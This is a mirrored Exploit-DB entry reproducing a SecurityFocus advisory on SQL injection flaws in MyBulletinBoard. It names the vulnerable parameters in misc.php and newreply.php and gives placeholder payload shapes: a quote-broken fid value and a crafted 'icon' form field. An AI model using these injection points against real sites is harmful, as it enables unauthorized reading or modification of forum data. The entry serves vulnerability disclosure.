bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/26228.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

18 lines
No EOL
701 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/14762/info
MyBulletinBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
misc.php :-
http://www.example.com/misc.php?action=rules&fid=-1' [SQL]
newreply.php :-
One may inject SQL data by submitting a HTTP POST with a modification
of the http header as follows:
Content-Disposition: form-data; name="icon"\r\n
\r\n
-1') [SQL] /*\r\n
Reference in a new issue View git blame Copy permalink